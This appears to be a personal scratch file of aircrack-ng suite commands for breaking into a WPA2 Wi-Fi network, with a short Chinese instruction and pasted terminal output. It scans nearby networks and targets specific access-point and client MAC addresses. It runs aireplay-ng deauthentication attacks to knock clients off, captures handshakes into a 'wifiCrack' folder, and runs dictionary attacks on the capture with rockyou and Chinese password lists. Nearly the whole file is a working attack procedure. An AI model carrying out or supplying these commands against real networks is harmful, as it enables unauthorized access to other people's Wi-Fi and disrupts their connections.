
8C:FD:18:44:BD:E0  -27        4        0    0   2  130   WPA2 CCMP   PSK  CMCC-E24M    

 sudo /sbin/airodump-ng wls3



B0:95:8E:FE:A9:73

Not good
::sudo /sbin/airodump -w output -c 11 –bssid B0:95:8E:FE:A9:73 wls3


::sudo /sbin/airodump-ng -c 11 --bssid B0:95:8E:FE:A9:73 -w /home/ml/PersonalX/wifiCrack wls3 

sudo /sbin/airodump-ng -c 2 --bssid 8C:FD:18:44:BD:E0 -w /home/ml/PersonalX/wifiCrack/airOut wls3 



保持上步抓包命令不中断，新打开一个窗口执行：

::sudo /sbin/aireplay-ng -0 2 -a 8C:FD:18:44:BD:E0 -c 34:29:12:60:14:3E wlan0mon 

sudo /sbin/aireplay-ng -0 2 -a 8C:FD:18:44:BD:E0  -c D8:00:4D:E5:0A:39 wls3

/*
--------------------------------
ml:~$ sudo /sbin/aireplay-ng -0 2 -a 8C:FD:18:44:BD:E0 -c 34:29:12:60:14:3E wlan0mon 
[sudo] password for ml: 
Interface wlan0mon: 
ioctl(SIOCGIFINDEX) failed: No such device
ml:~$ sudo /sbin/aireplay-ng -0 2 -a 98:F4:28:47:7C:7A  -c 22:E1:69:19:B8:14 wls3
10:37:55  Waiting for beacon frame (BSSID: 98:F4:28:47:7C:7A) on channel 2
10:37:55  wls3 is on channel 2, but the AP uses channel 4
ml:~$ 
----------------------------------
*/



aircrack-ng airOut-01.cap -w ./dict/wpa_wifi_password_dict.txt
aircrack-ng airOut-01.cap -w ./dict/passwd-CN-Top10000.txt
aircrack-ng airOut-01.cap -w ./dict/rockyou-top15000.txt
aircrack-ng airOut-01.cap -w ./dict/keyboard.txt
aircrack-ng airOut-01.cap -w ./dict/dict.txt
aircrack-ng airOut-01.cap -w ./dict/dict_file.txt

